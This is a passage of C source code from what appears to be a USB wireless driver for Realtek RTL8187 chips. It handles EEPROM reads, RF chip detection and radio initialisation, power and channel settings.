URTW_ASSERT_LOCKED(sc); req.bmRequestType = UT_WRITE_VENDOR_DEVICE; req.bRequest = URTW_8187_SETREGS_REQ; USETW(req.wValue, (val & 0xff) | 0xff00); USETW(req.wIndex, (val >> 8) & 0x3); USETW(req.wLength, sizeof(uint16_t)); return (urtw_do_request(sc, &req, &data)); } static usb_error_t urtw_write32_c(struct urtw_softc *sc, int val, uint32_t data) { struct usb_device_request req; URTW_ASSERT_LOCKED(sc); req.bmRequestType = UT_WRITE_VENDOR_DEVICE; req.bRequest = URTW_8187_SETREGS_REQ; USETW(req.wValue, (val & 0xff) | 0xff00); USETW(req.wIndex, (val >> 8) & 0x3); USETW(req.wLength, sizeof(uint32_t)); return (urtw_do_request(sc, &req, &data)); } static usb_error_t urtw_get_macaddr(struct urtw_softc *sc) { uint32_t data; usb_error_t error; error = urtw_eprom_read32(sc, URTW_EPROM_MACADDR, &data); if (error != 0) goto fail; sc->sc_bssid[0] = data & 0xff; sc->sc_bssid[1] = (data & 0xff00) >> 8; error = urtw_eprom_read32(sc, URTW_EPROM_MACADDR + 1, &data); if (error != 0) goto fail; sc->sc_bssid[2] = data & 0xff; sc->sc_bssid[3] = (data & 0xff00) >> 8; error = urtw_eprom_read32(sc, URTW_EPROM_MACADDR + 2, &data); if (error != 0) goto fail; sc->sc_bssid[4] = data & 0xff; sc->sc_bssid[5] = (data & 0xff00) >> 8; fail: return (error); } static usb_error_t urtw_eprom_read32(struct urtw_softc *sc, uint32_t addr, uint32_t *data) { #define URTW_READCMD_LEN 3 int addrlen, i; int16_t addrstr[8], data16, readcmd[] = { 1, 1, 0 }; usb_error_t error; /* NB: make sure the buffer is initialized */ *data = 0; /* enable EPROM programming */ urtw_write8_m(sc, URTW_EPROM_CMD, URTW_EPROM_CMD_PROGRAM_MODE); DELAY(URTW_EPROM_DELAY); error = urtw_eprom_cs(sc, URTW_EPROM_ENABLE); if (error != 0) goto fail; error = urtw_eprom_ck(sc); if (error != 0) goto fail; error = urtw_eprom_sendbits(sc, readcmd, URTW_READCMD_LEN); if (error != 0) goto fail; if (sc->sc_epromtype == URTW_EEPROM_93C56) { addrlen = 8; addrstr[0] = addr & (1 << 7); addrstr[1] = addr & (1 << 6); addrstr[2] = addr & (1 << 5); addrstr[3] = addr & (1 << 4); addrstr[4] = addr & (1 << 3); addrstr[5] = addr & (1 << 2); addrstr[6] = addr & (1 << 1); addrstr[7] = addr & (1 << 0); } else { addrlen=6; addrstr[0] = addr & (1 << 5); addrstr[1] = addr & (1 << 4); addrstr[2] = addr & (1 << 3); addrstr[3] = addr & (1 << 2); addrstr[4] = addr & (1 << 1); addrstr[5] = addr & (1 << 0); } error = urtw_eprom_sendbits(sc, addrstr, addrlen); if (error != 0) goto fail; error = urtw_eprom_writebit(sc, 0); if (error != 0) goto fail; for (i = 0; i < 16; i++) { error = urtw_eprom_ck(sc); if (error != 0) goto fail; error = urtw_eprom_readbit(sc, &data16); if (error != 0) goto fail; (*data) |= (data16 << (15 - i)); } error = urtw_eprom_cs(sc, URTW_EPROM_DISABLE); if (error != 0) goto fail; error = urtw_eprom_ck(sc); if (error != 0) goto fail; /* now disable EPROM programming */ urtw_write8_m(sc, URTW_EPROM_CMD, URTW_EPROM_CMD_NORMAL_MODE); fail: return (error); #undef URTW_READCMD_LEN } static usb_error_t urtw_eprom_cs(struct urtw_softc *sc, int able) { uint8_t data; usb_error_t error; urtw_read8_m(sc, URTW_EPROM_CMD, &data); if (able == URTW_EPROM_ENABLE) urtw_write8_m(sc, URTW_EPROM_CMD, data | URTW_EPROM_CS); else urtw_write8_m(sc, URTW_EPROM_CMD, data & ~URTW_EPROM_CS); DELAY(URTW_EPROM_DELAY); fail: return (error); } static usb_error_t urtw_eprom_ck(struct urtw_softc *sc) { uint8_t data; usb_error_t error; /* masking */ urtw_read8_m(sc, URTW_EPROM_CMD, &data); urtw_write8_m(sc, URTW_EPROM_CMD, data | URTW_EPROM_CK); DELAY(URTW_EPROM_DELAY); /* unmasking */ urtw_read8_m(sc, 
URTW_EPROM_CMD, &data); urtw_write8_m(sc, URTW_EPROM_CMD, data & ~URTW_EPROM_CK); DELAY(URTW_EPROM_DELAY); fail: return (error); } static usb_error_t urtw_eprom_readbit(struct urtw_softc *sc, int16_t *data) { uint8_t data8; usb_error_t error; urtw_read8_m(sc, URTW_EPROM_CMD, &data8); *data = (data8 & URTW_EPROM_READBIT) ? 1 : 0; DELAY(URTW_EPROM_DELAY); fail: return (error); } static usb_error_t urtw_eprom_writebit(struct urtw_softc *sc, int16_t bit) { uint8_t data; usb_error_t error; urtw_read8_m(sc, URTW_EPROM_CMD, &data); if (bit != 0) urtw_write8_m(sc, URTW_EPROM_CMD, data | URTW_EPROM_WRITEBIT); else urtw_write8_m(sc, URTW_EPROM_CMD, data & ~URTW_EPROM_WRITEBIT); DELAY(URTW_EPROM_DELAY); fail: return (error); } static usb_error_t urtw_eprom_sendbits(struct urtw_softc *sc, int16_t *buf, int buflen) { int i = 0; usb_error_t error = 0; for (i = 0; i < buflen; i++) { error = urtw_eprom_writebit(sc, buf[i]); if (error != 0) goto fail; error = urtw_eprom_ck(sc); if (error != 0) goto fail; } fail: return (error); } static usb_error_t urtw_get_txpwr(struct urtw_softc *sc) { int i, j; uint32_t data; usb_error_t error; error = urtw_eprom_read32(sc, URTW_EPROM_TXPW_BASE, &data); if (error != 0) goto fail; sc->sc_txpwr_cck_base = data & 0xf; sc->sc_txpwr_ofdm_base = (data >> 4) & 0xf; for (i = 1, j = 0; i < 6; i += 2, j++) { error = urtw_eprom_read32(sc, URTW_EPROM_TXPW0 + j, &data); if (error != 0) goto fail; sc->sc_txpwr_cck[i] = data & 0xf; sc->sc_txpwr_cck[i + 1] = (data & 0xf00) >> 8; sc->sc_txpwr_ofdm[i] = (data & 0xf0) >> 4; sc->sc_txpwr_ofdm[i + 1] = (data & 0xf000) >> 12; } for (i = 1, j = 0; i < 4; i += 2, j++) { error = urtw_eprom_read32(sc, URTW_EPROM_TXPW1 + j, &data); if (error != 0) goto fail; sc->sc_txpwr_cck[i + 6] = data & 0xf; sc->sc_txpwr_cck[i + 6 + 1] = (data & 0xf00) >> 8; sc->sc_txpwr_ofdm[i + 6] = (data & 0xf0) >> 4; sc->sc_txpwr_ofdm[i + 6 + 1] = (data & 0xf000) >> 12; } if (sc->sc_flags & URTW_RTL8187B) { error = urtw_eprom_read32(sc, URTW_EPROM_TXPW2, &data); if (error != 0) goto fail; sc->sc_txpwr_cck[1 + 6 + 4] = data & 0xf; sc->sc_txpwr_ofdm[1 + 6 + 4] = (data & 0xf0) >> 4; error = urtw_eprom_read32(sc, 0x0a, &data); if (error != 0) goto fail; sc->sc_txpwr_cck[2 + 6 + 4] = data & 0xf; sc->sc_txpwr_ofdm[2 + 6 + 4] = (data & 0xf0) >> 4; error = urtw_eprom_read32(sc, 0x1c, &data); if (error != 0) goto fail; sc->sc_txpwr_cck[3 + 6 + 4] = data & 0xf; sc->sc_txpwr_cck[3 + 6 + 4 + 1] = (data & 0xf00) >> 8; sc->sc_txpwr_ofdm[3 + 6 + 4] = (data & 0xf0) >> 4; sc->sc_txpwr_ofdm[3 + 6 + 4 + 1] = (data & 0xf000) >> 12; } else { for (i = 1, j = 0; i < 4; i += 2, j++) { error = urtw_eprom_read32(sc, URTW_EPROM_TXPW2 + j, &data); if (error != 0) goto fail; sc->sc_txpwr_cck[i + 6 + 4] = data & 0xf; sc->sc_txpwr_cck[i + 6 + 4 + 1] = (data & 0xf00) >> 8; sc->sc_txpwr_ofdm[i + 6 + 4] = (data & 0xf0) >> 4; sc->sc_txpwr_ofdm[i + 6 + 4 + 1] = (data & 0xf000) >> 12; } } fail: return (error); } static usb_error_t urtw_get_rfchip(struct urtw_softc *sc) { int ret; uint8_t data8; uint32_t data; usb_error_t error; if (sc->sc_flags & URTW_RTL8187B) { urtw_read8_m(sc, 0xe1, &data8); switch (data8) { case 0: sc->sc_flags |= URTW_RTL8187B_REV_B; break; case 1: sc->sc_flags |= URTW_RTL8187B_REV_D; break; case 2: sc->sc_flags |= URTW_RTL8187B_REV_E; break; default: device_printf(sc->sc_dev, "unknown type: %#x\n", data8); sc->sc_flags |= URTW_RTL8187B_REV_B; break; } } else { urtw_read32_m(sc, URTW_TX_CONF, &data); switch (data & URTW_TX_HWMASK) { case URTW_TX_R8187vD_B: sc->sc_flags |= URTW_RTL8187B; 
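		/*
		 * Descriptive note: when the URTW_RTL8187B flag was not
		 * already set, the hardware-version field of URTW_TX_CONF is
		 * examined; the R8187vD_B encoding identifies 8187B-class
		 * silicon, so the flag is set here and the 8187B code paths
		 * are used from this point on, while R8187vD is treated as a
		 * plain RTL8187L.
		 */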
break; case URTW_TX_R8187vD: break; default: device_printf(sc->sc_dev, "unknown RTL8187L type: %#x\n", data & URTW_TX_HWMASK); break; } } error = urtw_eprom_read32(sc, URTW_EPROM_RFCHIPID, &data); if (error != 0) goto fail; switch (data & 0xff) { case URTW_EPROM_RFCHIPID_RTL8225U: error = urtw_8225_isv2(sc, &ret); if (error != 0) goto fail; if (ret == 0) { sc->sc_rf_init = urtw_8225_rf_init; sc->sc_rf_set_sens = urtw_8225_rf_set_sens; sc->sc_rf_set_chan = urtw_8225_rf_set_chan; sc->sc_rf_stop = urtw_8225_rf_stop; } else { sc->sc_rf_init = urtw_8225v2_rf_init; sc->sc_rf_set_chan = urtw_8225v2_rf_set_chan; sc->sc_rf_stop = urtw_8225_rf_stop; } sc->sc_max_sens = URTW_8225_RF_MAX_SENS; sc->sc_sens = URTW_8225_RF_DEF_SENS; break; case URTW_EPROM_RFCHIPID_RTL8225Z2: sc->sc_rf_init = urtw_8225v2b_rf_init; sc->sc_rf_set_chan = urtw_8225v2b_rf_set_chan; sc->sc_max_sens = URTW_8225_RF_MAX_SENS; sc->sc_sens = URTW_8225_RF_DEF_SENS; sc->sc_rf_stop = urtw_8225_rf_stop; break; default: DPRINTF(sc, URTW_DEBUG_STATE, "unsupported RF chip %d\n", data & 0xff); error = USB_ERR_INVAL; goto fail; } device_printf(sc->sc_dev, "%s rf %s hwrev %s\n", (sc->sc_flags & URTW_RTL8187B) ? "rtl8187b" : "rtl8187l", ((data & 0xff) == URTW_EPROM_RFCHIPID_RTL8225U) ? "rtl8225u" : "rtl8225z2", (sc->sc_flags & URTW_RTL8187B) ? ((data8 == 0) ? "b" : (data8 == 1) ? "d" : "e") : "none"); fail: return (error); } static usb_error_t urtw_led_init(struct urtw_softc *sc) { uint32_t rev; usb_error_t error; urtw_read8_m(sc, URTW_PSR, &sc->sc_psr); error = urtw_eprom_read32(sc, URTW_EPROM_SWREV, &rev); if (error != 0) goto fail; switch (rev & URTW_EPROM_CID_MASK) { case URTW_EPROM_CID_ALPHA0: sc->sc_strategy = URTW_SW_LED_MODE1; break; case URTW_EPROM_CID_SERCOMM_PS: sc->sc_strategy = URTW_SW_LED_MODE3; break; case URTW_EPROM_CID_HW_LED: sc->sc_strategy = URTW_HW_LED; break; case URTW_EPROM_CID_RSVD0: case URTW_EPROM_CID_RSVD1: default: sc->sc_strategy = URTW_SW_LED_MODE0; break; } sc->sc_gpio_ledpin = URTW_LED_PIN_GPIO0; fail: return (error); } static usb_error_t urtw_8225_rf_init(struct urtw_softc *sc) { #define N(a) ((int)(sizeof(a) / sizeof((a)[0]))) int i; uint16_t data; usb_error_t error; error = urtw_8180_set_anaparam(sc, URTW_8225_ANAPARAM_ON); if (error) goto fail; error = urtw_8225_usb_init(sc); if (error) goto fail; urtw_write32_m(sc, URTW_RF_TIMING, 0x000a8008); urtw_read16_m(sc, URTW_BRSR, &data); /* XXX ??? 
*/ urtw_write16_m(sc, URTW_BRSR, 0xffff); urtw_write32_m(sc, URTW_RF_PARA, 0x100044); error = urtw_set_mode(sc, URTW_EPROM_CMD_CONFIG); if (error) goto fail; urtw_write8_m(sc, URTW_CONFIG3, 0x44); error = urtw_set_mode(sc, URTW_EPROM_CMD_NORMAL); if (error) goto fail; error = urtw_8185_rf_pins_enable(sc); if (error) goto fail; usb_pause_mtx(&sc->sc_mtx, 1000); for (i = 0; i < N(urtw_8225_rf_part1); i++) { urtw_8225_write(sc, urtw_8225_rf_part1[i].reg, urtw_8225_rf_part1[i].val); usb_pause_mtx(&sc->sc_mtx, 1); } usb_pause_mtx(&sc->sc_mtx, 100); urtw_8225_write(sc, URTW_8225_ADDR_2_MAGIC, URTW_8225_ADDR_2_DATA_MAGIC1); usb_pause_mtx(&sc->sc_mtx, 200); urtw_8225_write(sc, URTW_8225_ADDR_2_MAGIC, URTW_8225_ADDR_2_DATA_MAGIC2); usb_pause_mtx(&sc->sc_mtx, 200); urtw_8225_write(sc, URTW_8225_ADDR_0_MAGIC, URTW_8225_ADDR_0_DATA_MAGIC3); for (i = 0; i < 95; i++) { urtw_8225_write(sc, URTW_8225_ADDR_1_MAGIC, (uint8_t)(i + 1)); urtw_8225_write(sc, URTW_8225_ADDR_2_MAGIC, urtw_8225_rxgain[i]); } urtw_8225_write(sc, URTW_8225_ADDR_0_MAGIC, URTW_8225_ADDR_0_DATA_MAGIC4); urtw_8225_write(sc, URTW_8225_ADDR_0_MAGIC, URTW_8225_ADDR_0_DATA_MAGIC5); for (i = 0; i < 128; i++) { urtw_8187_write_phy_ofdm(sc, 0xb, urtw_8225_agc[i]); usb_pause_mtx(&sc->sc_mtx, 1); urtw_8187_write_phy_ofdm(sc, 0xa, (uint8_t)i + 0x80); usb_pause_mtx(&sc->sc_mtx, 1); } for (i = 0; i < N(urtw_8225_rf_part2); i++) { urtw_8187_write_phy_ofdm(sc, urtw_8225_rf_part2[i].reg, urtw_8225_rf_part2[i].val); usb_pause_mtx(&sc->sc_mtx, 1); } error = urtw_8225_setgain(sc, 4); if (error) goto fail; for (i = 0; i < N(urtw_8225_rf_part3); i++) { urtw_8187_write_phy_cck(sc, urtw_8225_rf_part3[i].reg, urtw_8225_rf_part3[i].val); usb_pause_mtx(&sc->sc_mtx, 1); } urtw_write8_m(sc, URTW_TESTR, 0x0d); error = urtw_8225_set_txpwrlvl(sc, 1); if (error) goto fail; urtw_8187_write_phy_cck(sc, 0x10, 0x9b); usb_pause_mtx(&sc->sc_mtx, 1); urtw_8187_write_phy_ofdm(sc, 0x26, 0x90); usb_pause_mtx(&sc->sc_mtx, 1); /* TX ant A, 0x0 for B */ error = urtw_8185_tx_antenna(sc, 0x3); if (error) goto fail; urtw_write32_m(sc, URTW_HSSI_PARA, 0x3dc00002); error = urtw_8225_rf_set_chan(sc, 1); fail: return (error); #undef N } static usb_error_t urtw_8185_rf_pins_enable(struct urtw_softc *sc) { usb_error_t error = 0; urtw_write16_m(sc, URTW_RF_PINS_ENABLE, 0x1ff7); fail: return (error); } static usb_error_t urtw_8185_tx_antenna(struct urtw_softc *sc, uint8_t ant) { usb_error_t error; urtw_write8_m(sc, URTW_TX_ANTENNA, ant); usb_pause_mtx(&sc->sc_mtx, 1); fail: return (error); } static usb_error_t urtw_8187_write_phy_ofdm_c(struct urtw_softc *sc, uint8_t addr, uint32_t data) { data = data & 0xff; return urtw_8187_write_phy(sc, addr, data); } static usb_error_t urtw_8187_write_phy_cck_c(struct urtw_softc *sc, uint8_t addr, uint32_t data) { data = data & 0xff; return urtw_8187_write_phy(sc, addr, data | 0x10000); } static usb_error_t urtw_8187_write_phy(struct urtw_softc *sc, uint8_t addr, uint32_t data) { uint32_t phyw; usb_error_t error; phyw = ((data << 8) | (addr | 0x80)); urtw_write8_m(sc, URTW_PHY_MAGIC4, ((phyw & 0xff000000) >> 24)); urtw_write8_m(sc, URTW_PHY_MAGIC3, ((phyw & 0x00ff0000) >> 16)); urtw_write8_m(sc, URTW_PHY_MAGIC2, ((phyw & 0x0000ff00) >> 8)); urtw_write8_m(sc, URTW_PHY_MAGIC1, ((phyw & 0x000000ff))); usb_pause_mtx(&sc->sc_mtx, 1); fail: return (error); } static usb_error_t urtw_8225_setgain(struct urtw_softc *sc, int16_t gain) { usb_error_t error; urtw_8187_write_phy_ofdm(sc, 0x0d, urtw_8225_gain[gain * 4]); urtw_8187_write_phy_ofdm(sc, 0x1b, 
urtw_8225_gain[gain * 4 + 2]); urtw_8187_write_phy_ofdm(sc, 0x1d, urtw_8225_gain[gain * 4 + 3]); urtw_8187_write_phy_ofdm(sc, 0x23, urtw_8225_gain[gain * 4 + 1]); fail: return (error); } static usb_error_t urtw_8225_usb_init(struct urtw_softc *sc) { uint8_t data; usb_error_t error; urtw_write8_m(sc, URTW_RF_PINS_SELECT + 1, 0); urtw_write8_m(sc, URTW_GPIO, 0); error = urtw_read8e(sc, 0x53, &data); if (error) goto fail; error = urtw_write8e(sc, 0x53, data | (1 << 7)); if (error) goto fail; urtw_write8_m(sc, URTW_RF_PINS_SELECT + 1, 4); urtw_write8_m(sc, URTW_GPIO, 0x20); urtw_write8_m(sc, URTW_GP_ENABLE, 0); urtw_write16_m(sc, URTW_RF_PINS_OUTPUT, 0x80); urtw_write16_m(sc, URTW_RF_PINS_SELECT, 0x80); urtw_write16_m(sc, URTW_RF_PINS_ENABLE, 0x80); usb_pause_mtx(&sc->sc_mtx, 500); fail: return (error); } static usb_error_t urtw_8225_write_c(struct urtw_softc *sc, uint8_t addr, uint16_t data) { uint16_t d80, d82, d84; usb_error_t error; urtw_read16_m(sc, URTW_RF_PINS_OUTPUT, &d80); d80 &= URTW_RF_PINS_MAGIC1; urtw_read16_m(sc, URTW_RF_PINS_ENABLE, &d82); urtw_read16_m(sc, URTW_RF_PINS_SELECT, &d84); d84 &= URTW_RF_PINS_MAGIC2; urtw_write16_m(sc, URTW_RF_PINS_ENABLE, d82 | URTW_RF_PINS_MAGIC3); urtw_write16_m(sc, URTW_RF_PINS_SELECT, d84 | URTW_RF_PINS_MAGIC3); DELAY(10); urtw_write16_m(sc, URTW_RF_PINS_OUTPUT, d80 | URTW_BB_HOST_BANG_EN); DELAY(2); urtw_write16_m(sc, URTW_RF_PINS_OUTPUT, d80); DELAY(10); error = urtw_8225_write_s16(sc, addr, 0x8225, &data); if (error != 0) goto fail; urtw_write16_m(sc, URTW_RF_PINS_OUTPUT, d80 | URTW_BB_HOST_BANG_EN); DELAY(10); urtw_write16_m(sc, URTW_RF_PINS_OUTPUT, d80 | URTW_BB_HOST_BANG_EN); urtw_write16_m(sc, URTW_RF_PINS_SELECT, d84); usb_pause_mtx(&sc->sc_mtx, 2); fail: return (error); } static usb_error_t urtw_8225_write_s16(struct urtw_softc *sc, uint8_t addr, int index, uint16_t *data) { uint8_t buf[2]; uint16_t data16; struct usb_device_request req; usb_error_t error = 0; data16 = *data; req.bmRequestType = UT_WRITE_VENDOR_DEVICE; req.bRequest = URTW_8187_SETREGS_REQ; USETW(req.wValue, addr); USETW(req.wIndex, index); USETW(req.wLength, sizeof(uint16_t)); buf[0] = (data16 & 0x00ff); buf[1] = (data16 & 0xff00) >> 8; error = urtw_do_request(sc, &req, buf); return (error); } static usb_error_t urtw_8225_rf_set_chan(struct urtw_softc *sc, int chan) { usb_error_t error; error = urtw_8225_set_txpwrlvl(sc, chan); if (error) goto fail; urtw_8225_write(sc, URTW_8225_ADDR_7_MAGIC, urtw_8225_channel[chan]); usb_pause_mtx(&sc->sc_mtx, 10); fail: return (error); } static usb_error_t urtw_8225_rf_set_sens(struct urtw_softc *sc, int sens) { usb_error_t error; if (sens < 0 || sens > 6) return -1; if (sens > 4) urtw_8225_write(sc, URTW_8225_ADDR_C_MAGIC, URTW_8225_ADDR_C_DATA_MAGIC1); else urtw_8225_write(sc, URTW_8225_ADDR_C_MAGIC, URTW_8225_ADDR_C_DATA_MAGIC2); sens = 6 - sens; error = urtw_8225_setgain(sc, sens); if (error) goto fail; urtw_8187_write_phy_cck(sc, 0x41, urtw_8225_threshold[sens]); fail: return (error); } static usb_error_t urtw_8225_set_txpwrlvl(struct urtw_softc *sc, int chan) { int i, idx, set; uint8_t *cck_pwltable; uint8_t cck_pwrlvl_max, ofdm_pwrlvl_min, ofdm_pwrlvl_max; uint8_t cck_pwrlvl = sc->sc_txpwr_cck[chan] & 0xff; uint8_t ofdm_pwrlvl = sc->sc_txpwr_ofdm[chan] & 0xff; usb_error_t error; cck_pwrlvl_max = 11; ofdm_pwrlvl_max = 25; /* 12 -> 25 */ ofdm_pwrlvl_min = 10; /* CCK power setting */ cck_pwrlvl = (cck_pwrlvl > cck_pwrlvl_max) ? cck_pwrlvl_max : cck_pwrlvl; idx = cck_pwrlvl % 6; set = cck_pwrlvl / 6; cck_pwltable = (chan == 14) ? 
urtw_8225_txpwr_cck_ch14 : urtw_8225_txpwr_cck; urtw_write8_m(sc, URTW_TX_GAIN_CCK, urtw_8225_tx_gain_cck_ofdm[set] >> 1); for (i = 0; i < 8; i++) { urtw_8187_write_phy_cck(sc, 0x44 + i, cck_pwltable[idx * 8 + i]); } usb_pause_mtx(&sc->sc_mtx, 1); /* OFDM power setting */ ofdm_pwrlvl = (ofdm_pwrlvl > (ofdm_pwrlvl_max - ofdm_pwrlvl_min)) ? ofdm_pwrlvl_max : ofdm_pwrlvl + ofdm_pwrlvl_min; ofdm_pwrlvl = (ofdm_pwrlvl > 35) ? 35 : ofdm_pwrlvl; idx = ofdm_pwrlvl % 6; set = ofdm_pwrlvl / 6; error = urtw_8185_set_anaparam2(sc, URTW_8225_ANAPARAM2_ON); if (error) goto fail; urtw_8187_write_phy_ofdm(sc, 2, 0x42); urtw_8187_write_phy_ofdm(sc, 6, 0); urtw_8187_write_phy_ofdm(sc, 8, 0); urtw_write8_m(sc, URTW_TX_GAIN_OFDM, urtw_8225_tx_gain_cck_ofdm[set] >> 1); urtw_8187_write_phy_ofdm(sc, 0x5, urtw_8225_txpwr_ofdm[idx]); urtw_8187_write_phy_ofdm(sc, 0x7, urtw_8225_txpwr_ofdm[idx]); usb_pause_mtx(&sc->sc_mtx, 1); fail: return (error); } static usb_error_t urtw_8225_rf_stop(struct urtw_softc *sc) { uint8_t data; usb_error_t error; urtw_8225_write(sc, 0x4, 0x1f); error = urtw_set_mode(sc, URTW_EPROM_CMD_CONFIG); if (error) goto fail; urtw_read8_m(sc, URTW_CONFIG3, &data); urtw_write8_m(sc, URTW_CONFIG3, data | URTW_CONFIG3_ANAPARAM_WRITE); if (sc->sc_flags & URTW_RTL8187B) { urtw_write32_m(sc, URTW_ANAPARAM2, URTW_8187B_8225_ANAPARAM2_OFF); urtw_write32_m(sc, URTW_ANAPARAM, URTW_8187B_8225_ANAPARAM_OFF); urtw_write32_m(sc, URTW_ANAPARAM3, URTW_8187B_8225_ANAPARAM3_OFF); } else { urtw_write32_m(sc, URTW_ANAPARAM2, URTW_8225_ANAPARAM2_OFF); urtw_write32_m(sc, URTW_ANAPARAM, URTW_8225_ANAPARAM_OFF); } urtw_write8_m(sc, URTW_CONFIG3, data & ~URTW_CONFIG3_ANAPARAM_WRITE); error = urtw_set_mode(sc, URTW_EPROM_CMD_NORMAL); if (error) goto fail; fail: return (error); } static usb_error_t urtw_8225v2_rf_init(struct urtw_softc *sc) { #define N(a) ((int)(sizeof(a) / sizeof((a)[0]))) int i; uint16_t data; uint32_t data32; usb_error_t error; error = urtw_8180_set_anaparam(sc, URTW_8225_ANAPARAM_ON); if (error) goto fail; error = urtw_8225_usb_init(sc); if (error) goto fail; urtw_write32_m(sc, URTW_RF_TIMING, 0x000a8008); urtw_read16_m(sc, URTW_BRSR, &data); /* XXX ??? */ urtw_write16_m(sc, URTW_BRSR, 0xffff); urtw_write32_m(sc, URTW_RF_PARA, 0x100044); error = urtw_set_mode(sc, URTW_EPROM_CMD_CONFIG); if (error) goto fail; urtw_write8_m(sc, URTW_CONFIG3, 0x44); error = urtw_set_mode(sc, URTW_EPROM_CMD_NORMAL); if (error) goto fail; error = urtw_8185_rf_pins_enable(sc); if (error) goto fail; usb_pause_mtx(&sc->sc_mtx, 500); for (i = 0; i < N(urtw_8225v2_rf_part1); i++) { urtw_8225_write(sc, urtw_8225v2_rf_part1[i].reg, urtw_8225v2_rf_part1[i].val); } usb_pause_mtx(&sc->sc_mtx, 50); urtw_8225_write(sc, URTW_8225_ADDR_0_MAGIC, URTW_8225_ADDR_0_DATA_MAGIC1); for (i = 0; i < 95; i++) { urtw_8225_write(sc, URTW_8225_ADDR_1_MAGIC, (uint8_t)(i + 1)); urtw_8225_write(sc, URTW_8225_ADDR_2_MAGIC, urtw_8225v2_rxgain[i]); } urtw_8225_write(sc, URTW_8225_ADDR_3_MAGIC, URTW_8225_ADDR_3_DATA_MAGIC1); urtw_8225_write(sc, URTW_8225_ADDR_5_MAGIC, URTW_8225_ADDR_5_DATA_MAGIC1); urtw_8225_write(sc, URTW_8225_ADDR_0_MAGIC, URTW_8225_ADDR_0_DATA_MAGIC2); urtw_8225_write(sc, URTW_8225_ADDR_2_MAGIC, URTW_8225_ADDR_2_DATA_MAGIC1); usb_pause_mtx(&sc->sc_mtx, 100); urtw_8225_write(sc, URTW_8225_ADDR_2_MAGIC, URTW_8225_ADDR_2_DATA_MAGIC2); usb_pause_mtx(&sc->sc_mtx, 100); error = urtw_8225_read(sc, URTW_8225_ADDR_6_MAGIC, &data32); if (error != 0) goto fail; if (data32 != URTW_8225_ADDR_6_DATA_MAGIC1) device_printf(sc->sc_dev, "expect 0xe6!! 
(0x%x)\n", data32); if (!(data32 & URTW_8225_ADDR_6_DATA_MAGIC2)) { urtw_8225_write(sc, URTW_8225_ADDR_2_MAGIC, URTW_8225_ADDR_2_DATA_MAGIC1); usb_pause_mtx(&sc->sc_mtx, 100); urtw_8225_write(sc, URTW_8225_ADDR_2_MAGIC, URTW_8225_ADDR_2_DATA_MAGIC2); usb_pause_mtx(&sc->sc_mtx, 50); error = urtw_8225_read(sc, URTW_8225_ADDR_6_MAGIC, &data32); if (error != 0) goto fail; if (!(data32 & URTW_8225_ADDR_6_DATA_MAGIC2)) device_printf(sc->sc_dev, "RF calibration failed\n"); } usb_pause_mtx(&sc->sc_mtx, 100); urtw_8225_write(sc, URTW_8225_ADDR_0_MAGIC, URTW_8225_ADDR_0_DATA_MAGIC6); for (i = 0; i < 128; i++) { urtw_8187_write_phy_ofdm(sc, 0xb, urtw_8225_agc[i]); urtw_8187_write_phy_ofdm(sc, 0xa, (uint8_t)i + 0x80); } for (i = 0; i < N(urtw_8225v2_rf_part2); i++) { urtw_8187_write_phy_ofdm(sc, urtw_8225v2_rf_part2[i].reg, urtw_8225v2_rf_part2[i].val); } error = urtw_8225v2_setgain(sc, 4); if (error) goto fail; for (i = 0; i < N(urtw_8225v2_rf_part3); i++) { urtw_8187_write_phy_cck(sc, urtw_8225v2_rf_part3[i].reg, urtw_8225v2_rf_part3[i].val); } urtw_write8_m(sc, URTW_TESTR, 0x0d); error = urtw_8225v2_set_txpwrlvl(sc, 1); if (error) goto fail; urtw_8187_write_phy_cck(sc, 0x10, 0x9b); urtw_8187_write_phy_ofdm(sc, 0x26, 0x90); /* TX ant A, 0x0 for B */ error = urtw_8185_tx_antenna(sc, 0x3); if (error) goto fail; urtw_write32_m(sc, URTW_HSSI_PARA, 0x3dc00002); error = urtw_8225_rf_set_chan(sc, 1); fail: return (error); #undef N } static usb_error_t urtw_8225v2_rf_set_chan(struct urtw_softc *sc, int chan) { usb_error_t error; error = urtw_8225v2_set_txpwrlvl(sc, chan); if (error) goto fail; urtw_8225_write(sc, URTW_8225_ADDR_7_MAGIC, urtw_8225_channel[chan]); usb_pause_mtx(&sc->sc_mtx, 10); fail: return (error); } static usb_error_t urtw_8225_read(struct urtw_softc *sc, uint8_t addr, uint32_t *data) { int i; int16_t bit; uint8_t rlen = 12, wlen = 6; uint16_t o1, o2, o3, tmp; uint32_t d2w = ((uint32_t)(addr & 0x1f)) << 27; uint32_t mask = 0x80000000, value = 0; usb_error_t error; urtw_read16_m(sc, URTW_RF_PINS_OUTPUT, &o1); urtw_read16_m(sc, URTW_RF_PINS_ENABLE, &o2); urtw_read16_m(sc, URTW_RF_PINS_SELECT, &o3); urtw_write16_m(sc, URTW_RF_PINS_ENABLE, o2 | URTW_RF_PINS_MAGIC4); urtw_write16_m(sc, URTW_RF_PINS_SELECT, o3 | URTW_RF_PINS_MAGIC4); o1 &= ~URTW_RF_PINS_MAGIC4; urtw_write16_m(sc, URTW_RF_PINS_OUTPUT, o1 | URTW_BB_HOST_BANG_EN); DELAY(5); urtw_write16_m(sc, URTW_RF_PINS_OUTPUT, o1); DELAY(5); for (i = 0; i < (wlen / 2); i++, mask = mask >> 1) { bit = ((d2w & mask) != 0) ? 1 : 0; urtw_write16_m(sc, URTW_RF_PINS_OUTPUT, bit | o1); DELAY(2); urtw_write16_m(sc, URTW_RF_PINS_OUTPUT, bit | o1 | URTW_BB_HOST_BANG_CLK); DELAY(2); urtw_write16_m(sc, URTW_RF_PINS_OUTPUT, bit | o1 | URTW_BB_HOST_BANG_CLK); DELAY(2); mask = mask >> 1; if (i == 2) break; bit = ((d2w & mask) != 0) ? 
